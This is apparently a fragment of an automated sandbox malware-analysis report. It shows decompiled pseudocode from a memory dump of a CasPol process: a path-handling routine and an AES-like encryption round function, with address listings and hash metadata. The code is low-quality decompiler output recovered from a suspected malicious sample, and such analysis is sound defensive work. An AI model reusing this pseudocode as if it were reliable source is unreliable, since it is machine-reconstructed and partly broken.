																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E012695D0();
																			L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return L0126B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = L01263D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return L0126B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                                                                                                                                                                                                                                                                            0x01244128
                                                                                                                                                                                                                                                                                                                            0x01244135
                                                                                                                                                                                                                                                                                                                            0x0124413c
                                                                                                                                                                                                                                                                                                                            0x01244141
                                                                                                                                                                                                                                                                                                                            0x01244145
                                                                                                                                                                                                                                                                                                                            0x01244147
                                                                                                                                                                                                                                                                                                                            0x0124414e
                                                                                                                                                                                                                                                                                                                            0x01244151
                                                                                                                                                                                                                                                                                                                            0x01244159
                                                                                                                                                                                                                                                                                                                            0x0124415c
                                                                                                                                                                                                                                                                                                                            0x01244160
                                                                                                                                                                                                                                                                                                                            0x01244164
                                                                                                                                                                                                                                                                                                                            0x01244168
                                                                                                                                                                                                                                                                                                                            0x0124416c
                                                                                                                                                                                                                                                                                                                            0x0124417f
                                                                                                                                                                                                                                                                                                                            0x01244181
                                                                                                                                                                                                                                                                                                                            0x0124446a
                                                                                                                                                                                                                                                                                                                            0x0124446a
                                                                                                                                                                                                                                                                                                                            0x0124418c
                                                                                                                                                                                                                                                                                                                            0x01244195
                                                                                                                                                                                                                                                                                                                            0x01244199
                                                                                                                                                                                                                                                                                                                            0x01244432
                                                                                                                                                                                                                                                                                                                            0x01244439
                                                                                                                                                                                                                                                                                                                            0x0124443d
                                                                                                                                                                                                                                                                                                                            0x01244442
                                                                                                                                                                                                                                                                                                                            0x01244447
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0124419f
                                                                                                                                                                                                                                                                                                                            0x012441a3
                                                                                                                                                                                                                                                                                                                            0x012441b1
                                                                                                                                                                                                                                                                                                                            0x012441b9
                                                                                                                                                                                                                                                                                                                            0x012441bd
                                                                                                                                                                                                                                                                                                                            0x012445db
                                                                                                                                                                                                                                                                                                                            0x012445db
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012441c3
                                                                                                                                                                                                                                                                                                                            0x012441c3
                                                                                                                                                                                                                                                                                                                            0x012441ce
                                                                                                                                                                                                                                                                                                                            0x012441d4
                                                                                                                                                                                                                                                                                                                            0x0128e138
                                                                                                                                                                                                                                                                                                                            0x0128e13e
                                                                                                                                                                                                                                                                                                                            0x0128e169
                                                                                                                                                                                                                                                                                                                            0x0128e16d
                                                                                                                                                                                                                                                                                                                            0x0128e19e
                                                                                                                                                                                                                                                                                                                            0x0128e16f
                                                                                                                                                                                                                                                                                                                            0x0128e16f
                                                                                                                                                                                                                                                                                                                            0x0128e175
                                                                                                                                                                                                                                                                                                                            0x0128e179
                                                                                                                                                                                                                                                                                                                            0x0128e18f
                                                                                                                                                                                                                                                                                                                            0x0128e193
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0128e199
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0128e199
                                                                                                                                                                                                                                                                                                                            0x0128e193
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012441da
                                                                                                                                                                                                                                                                                                                            0x012441da
                                                                                                                                                                                                                                                                                                                            0x012441df
                                                                                                                                                                                                                                                                                                                            0x012441e4
                                                                                                                                                                                                                                                                                                                            0x012441ec
                                                                                                                                                                                                                                                                                                                            0x01244203
                                                                                                                                                                                                                                                                                                                            0x01244207
                                                                                                                                                                                                                                                                                                                            0x0128e1fd
                                                                                                                                                                                                                                                                                                                            0x01244222
                                                                                                                                                                                                                                                                                                                            0x01244226
                                                                                                                                                                                                                                                                                                                            0x0128e1f3
                                                                                                                                                                                                                                                                                                                            0x0128e1f3
                                                                                                                                                                                                                                                                                                                            0x0124422c
                                                                                                                                                                                                                                                                                                                            0x0124422c
                                                                                                                                                                                                                                                                                                                            0x01244233
                                                                                                                                                                                                                                                                                                                            0x0128e1ed
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x01244239
                                                                                                                                                                                                                                                                                                                            0x01244239
                                                                                                                                                                                                                                                                                                                            0x01244239
                                                                                                                                                                                                                                                                                                                            0x01244239
                                                                                                                                                                                                                                                                                                                            0x01244233
                                                                                                                                                                                                                                                                                                                            0x01244226
                                                                                                                                                                                                                                                                                                                            0x012441ee
                                                                                                                                                                                                                                                                                                                            0x012441ee
                                                                                                                                                                                                                                                                                                                            0x012441f4
                                                                                                                                                                                                                                                                                                                            0x01244575
                                                                                                                                                                                                                                                                                                                            0x0128e1b1
                                                                                                                                                                                                                                                                                                                            0x0128e1b1
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0124457b
                                                                                                                                                                                                                                                                                                                            0x0124457b
                                                                                                                                                                                                                                                                                                                            0x01244582
                                                                                                                                                                                                                                                                                                                            0x0128e1ab
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x01244588
                                                                                                                                                                                                                                                                                                                            0x01244588
                                                                                                                                                                                                                                                                                                                            0x0124458c
                                                                                                                                                                                                                                                                                                                            0x0128e1c4
                                                                                                                                                                                                                                                                                                                            0x0128e1c4
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x01244592
                                                                                                                                                                                                                                                                                                                            0x01244592
                                                                                                                                                                                                                                                                                                                            0x01244599
                                                                                                                                                                                                                                                                                                                            0x0128e1be
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0124459f
                                                                                                                                                                                                                                                                                                                            0x0124459f
                                                                                                                                                                                                                                                                                                                            0x012445a3
                                                                                                                                                                                                                                                                                                                            0x0128e1d7
                                                                                                                                                                                                                                                                                                                            0x0128e1e4
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012445a9
                                                                                                                                                                                                                                                                                                                            0x012445a9
                                                                                                                                                                                                                                                                                                                            0x012445b0
                                                                                                                                                                                                                                                                                                                            0x0128e1d1
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012445b6
                                                                                                                                                                                                                                                                                                                            0x012445b6
                                                                                                                                                                                                                                                                                                                            0x012445b6
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012445b6
                                                                                                                                                                                                                                                                                                                            0x012445b0
                                                                                                                                                                                                                                                                                                                            0x012445a3
                                                                                                                                                                                                                                                                                                                            0x01244599
                                                                                                                                                                                                                                                                                                                            0x0124458c
                                                                                                                                                                                                                                                                                                                            0x01244582
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012441f4
                                                                                                                                                                                                                                                                                                                            0x0124423e
                                                                                                                                                                                                                                                                                                                            0x01244241
                                                                                                                                                                                                                                                                                                                            0x012445c0
                                                                                                                                                                                                                                                                                                                            0x012445c4
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012445ca
                                                                                                                                                                                                                                                                                                                            0x012445ca
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0128e207
                                                                                                                                                                                                                                                                                                                            0x0128e20f
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012445d1
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012445ca
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x01244247
                                                                                                                                                                                                                                                                                                                            0x01244247
                                                                                                                                                                                                                                                                                                                            0x01244247
                                                                                                                                                                                                                                                                                                                            0x01244249
                                                                                                                                                                                                                                                                                                                            0x01244249
                                                                                                                                                                                                                                                                                                                            0x01244249
                                                                                                                                                                                                                                                                                                                            0x01244251
                                                                                                                                                                                                                                                                                                                            0x01244251
                                                                                                                                                                                                                                                                                                                            0x01244257
                                                                                                                                                                                                                                                                                                                            0x0124425f
                                                                                                                                                                                                                                                                                                                            0x0124426e
                                                                                                                                                                                                                                                                                                                            0x01244270
                                                                                                                                                                                                                                                                                                                            0x0124427a
                                                                                                                                                                                                                                                                                                                            0x0128e219
                                                                                                                                                                                                                                                                                                                            0x0128e219
                                                                                                                                                                                                                                                                                                                            0x01244280
                                                                                                                                                                                                                                                                                                                            0x01244282
                                                                                                                                                                                                                                                                                                                            0x01244456
                                                                                                                                                                                                                                                                                                                            0x012445ea
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012445f0
                                                                                                                                                                                                                                                                                                                            0x0128e223
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0128e223
                                                                                                                                                                                                                                                                                                                            0x0124445c
                                                                                                                                                                                                                                                                                                                            0x0124445c
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0124445c
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x01244288
                                                                                                                                                                                                                                                                                                                            0x0124428c
                                                                                                                                                                                                                                                                                                                            0x0128e298
                                                                                                                                                                                                                                                                                                                            0x01244292
                                                                                                                                                                                                                                                                                                                            0x01244292
                                                                                                                                                                                                                                                                                                                            0x0124429e
                                                                                                                                                                                                                                                                                                                            0x012442a3
                                                                                                                                                                                                                                                                                                                            0x012442a7
                                                                                                                                                                                                                                                                                                                            0x012442ac
                                                                                                                                                                                                                                                                                                                            0x0128e22d
                                                                                                                                                                                                                                                                                                                            0x012442b2
                                                                                                                                                                                                                                                                                                                            0x012442b2
                                                                                                                                                                                                                                                                                                                            0x012442b9
                                                                                                                                                                                                                                                                                                                            0x012442bc
                                                                                                                                                                                                                                                                                                                            0x012442c2
                                                                                                                                                                                                                                                                                                                            0x012442ca
                                                                                                                                                                                                                                                                                                                            0x012442cd
                                                                                                                                                                                                                                                                                                                            0x012442cd
                                                                                                                                                                                                                                                                                                                            0x012442d4
                                                                                                                                                                                                                                                                                                                            0x0124433f
                                                                                                                                                                                                                                                                                                                            0x0124433f
                                                                                                                                                                                                                                                                                                                            0x012442d6
                                                                                                                                                                                                                                                                                                                            0x012442d6
                                                                                                                                                                                                                                                                                                                            0x012442d9
                                                                                                                                                                                                                                                                                                                            0x012442dd
                                                                                                                                                                                                                                                                                                                            0x012442eb
                                                                                                                                                                                                                                                                                                                            0x0128e23a
                                                                                                                                                                                                                                                                                                                            0x012442f1
                                                                                                                                                                                                                                                                                                                            0x01244305
                                                                                                                                                                                                                                                                                                                            0x0124430d
                                                                                                                                                                                                                                                                                                                            0x01244315
                                                                                                                                                                                                                                                                                                                            0x01244318
                                                                                                                                                                                                                                                                                                                            0x0124431f
                                                                                                                                                                                                                                                                                                                            0x01244322
                                                                                                                                                                                                                                                                                                                            0x0124432e
                                                                                                                                                                                                                                                                                                                            0x0124433b
                                                                                                                                                                                                                                                                                                                            0x0124433b
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0124432e
                                                                                                                                                                                                                                                                                                                            0x012442eb
                                                                                                                                                                                                                                                                                                                            0x0124434c
                                                                                                                                                                                                                                                                                                                            0x0124434e
                                                                                                                                                                                                                                                                                                                            0x01244352
                                                                                                                                                                                                                                                                                                                            0x01244359
                                                                                                                                                                                                                                                                                                                            0x0124435e
                                                                                                                                                                                                                                                                                                                            0x01244361
                                                                                                                                                                                                                                                                                                                            0x0124436e
                                                                                                                                                                                                                                                                                                                            0x0124438a
                                                                                                                                                                                                                                                                                                                            0x0124438e
                                                                                                                                                                                                                                                                                                                            0x01244396
                                                                                                                                                                                                                                                                                                                            0x0124439e
                                                                                                                                                                                                                                                                                                                            0x012443a1
                                                                                                                                                                                                                                                                                                                            0x012443ad
                                                                                                                                                                                                                                                                                                                            0x012443bb
                                                                                                                                                                                                                                                                                                                            0x012443bb
                                                                                                                                                                                                                                                                                                                            0x012443ad
                                                                                                                                                                                                                                                                                                                            0x0124436e
                                                                                                                                                                                                                                                                                                                            0x012443bf
                                                                                                                                                                                                                                                                                                                            0x012443c5
                                                                                                                                                                                                                                                                                                                            0x01244463
                                                                                                                                                                                                                                                                                                                            0x01244463
                                                                                                                                                                                                                                                                                                                            0x012443ce
                                                                                                                                                                                                                                                                                                                            0x012443d5
                                                                                                                                                                                                                                                                                                                            0x012443d9
                                                                                                                                                                                                                                                                                                                            0x012443df
                                                                                                                                                                                                                                                                                                                            0x01244475
                                                                                                                                                                                                                                                                                                                            0x01244479
                                                                                                                                                                                                                                                                                                                            0x01244491
                                                                                                                                                                                                                                                                                                                            0x01244491
                                                                                                                                                                                                                                                                                                                            0x01244479
                                                                                                                                                                                                                                                                                                                            0x012443e5
                                                                                                                                                                                                                                                                                                                            0x012443eb
                                                                                                                                                                                                                                                                                                                            0x012443f4
                                                                                                                                                                                                                                                                                                                            0x012443f6
                                                                                                                                                                                                                                                                                                                            0x012443f9
                                                                                                                                                                                                                                                                                                                            0x012443fc
                                                                                                                                                                                                                                                                                                                            0x012443ff
                                                                                                                                                                                                                                                                                                                            0x012444e8
                                                                                                                                                                                                                                                                                                                            0x012444ed
                                                                                                                                                                                                                                                                                                                            0x012444f3
                                                                                                                                                                                                                                                                                                                            0x0128e247
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012444f9
                                                                                                                                                                                                                                                                                                                            0x01244504
                                                                                                                                                                                                                                                                                                                            0x01244508
                                                                                                                                                                                                                                                                                                                            0x0124450f
                                                                                                                                                                                                                                                                                                                            0x0128e269
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x01244515
                                                                                                                                                                                                                                                                                                                            0x01244519
                                                                                                                                                                                                                                                                                                                            0x01244531
                                                                                                                                                                                                                                                                                                                            0x01244534
                                                                                                                                                                                                                                                                                                                            0x01244537
                                                                                                                                                                                                                                                                                                                            0x0124453e
                                                                                                                                                                                                                                                                                                                            0x01244541
                                                                                                                                                                                                                                                                                                                            0x0124454a
                                                                                                                                                                                                                                                                                                                            0x0128e255
                                                                                                                                                                                                                                                                                                                            0x0128e255
                                                                                                                                                                                                                                                                                                                            0x0128e25b
                                                                                                                                                                                                                                                                                                                            0x0128e25e
                                                                                                                                                                                                                                                                                                                            0x0128e261
                                                                                                                                                                                                                                                                                                                            0x0128e261
                                                                                                                                                                                                                                                                                                                            0x01244555
                                                                                                                                                                                                                                                                                                                            0x01244559
                                                                                                                                                                                                                                                                                                                            0x0124455d
                                                                                                                                                                                                                                                                                                                            0x0128e26d
                                                                                                                                                                                                                                                                                                                            0x0128e270
                                                                                                                                                                                                                                                                                                                            0x0128e274
                                                                                                                                                                                                                                                                                                                            0x0128e27a
                                                                                                                                                                                                                                                                                                                            0x0128e27d
                                                                                                                                                                                                                                                                                                                            0x0128e28e
                                                                                                                                                                                                                                                                                                                            0x0128e28e
                                                                                                                                                                                                                                                                                                                            0x01244563
                                                                                                                                                                                                                                                                                                                            0x01244563
                                                                                                                                                                                                                                                                                                                            0x01244569
                                                                                                                                                                                                                                                                                                                            0x01244569
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0124455d
                                                                                                                                                                                                                                                                                                                            0x0124450f
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012444f3
                                                                                                                                                                                                                                                                                                                            0x012443ff
                                                                                                                                                                                                                                                                                                                            0x01244405
                                                                                                                                                                                                                                                                                                                            0x01244405
                                                                                                                                                                                                                                                                                                                            0x01244405
                                                                                                                                                                                                                                                                                                                            0x012442ac
                                                                                                                                                                                                                                                                                                                            0x0124428c
                                                                                                                                                                                                                                                                                                                            0x01244282
                                                                                                                                                                                                                                                                                                                            0x01244407
                                                                                                                                                                                                                                                                                                                            0x0124440d
                                                                                                                                                                                                                                                                                                                            0x0128e2af
                                                                                                                                                                                                                                                                                                                            0x0128e2af
                                                                                                                                                                                                                                                                                                                            0x01244413
                                                                                                                                                                                                                                                                                                                            0x01244413
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012441d4
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012441c3
                                                                                                                                                                                                                                                                                                                            0x012441bd
                                                                                                                                                                                                                                                                                                                            0x01244415
                                                                                                                                                                                                                                                                                                                            0x01244415
                                                                                                                                                                                                                                                                                                                            0x01244416
                                                                                                                                                                                                                                                                                                                            0x01244417
                                                                                                                                                                                                                                                                                                                            0x01244429
                                                                                                                                                                                                                                                                                                                            0x0124416e
                                                                                                                                                                                                                                                                                                                            0x0124416e
                                                                                                                                                                                                                                                                                                                            0x01244175
                                                                                                                                                                                                                                                                                                                            0x01244498
                                                                                                                                                                                                                                                                                                                            0x0124449f
                                                                                                                                                                                                                                                                                                                            0x0128e12d
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0128e133
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0128e133
                                                                                                                                                                                                                                                                                                                            0x012444a5
                                                                                                                                                                                                                                                                                                                            0x012444a5
                                                                                                                                                                                                                                                                                                                            0x012444aa
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x012444bb
                                                                                                                                                                                                                                                                                                                            0x012444ca
                                                                                                                                                                                                                                                                                                                            0x012444d6
                                                                                                                                                                                                                                                                                                                            0x012444d7
                                                                                                                                                                                                                                                                                                                            0x012444d8
                                                                                                                                                                                                                                                                                                                            0x012444e3
                                                                                                                                                                                                                                                                                                                            0x012444e3
                                                                                                                                                                                                                                                                                                                            0x012444aa
                                                                                                                                                                                                                                                                                                                            0x0124417b
                                                                                                                                                                                                                                                                                                                            0x0124417b
                                                                                                                                                                                                                                                                                                                            0x0124417b
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0124417b
                                                                                                                                                                                                                                                                                                                            0x01244175
                                                                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: fd385b7d4b88e9c09d50066e7686e6bfd7d1d7266b70732000ab10dac9f86dbe
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 9c71c67c4482e696aea25a3c80fa3f7adbf2f6a40dcdf92e4ce94f9220743f35
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd385b7d4b88e9c09d50066e7686e6bfd7d1d7266b70732000ab10dac9f86dbe
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63F191706282528FD728EF18C481B7ABBE1FF98714F15492EF586CB291E774D881CB52
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 00405843 Relevance: .4, Instructions: 435COMMONCrypto
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 26%
                                                                                                                                                                                                                                                                                                                            			E00405843(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
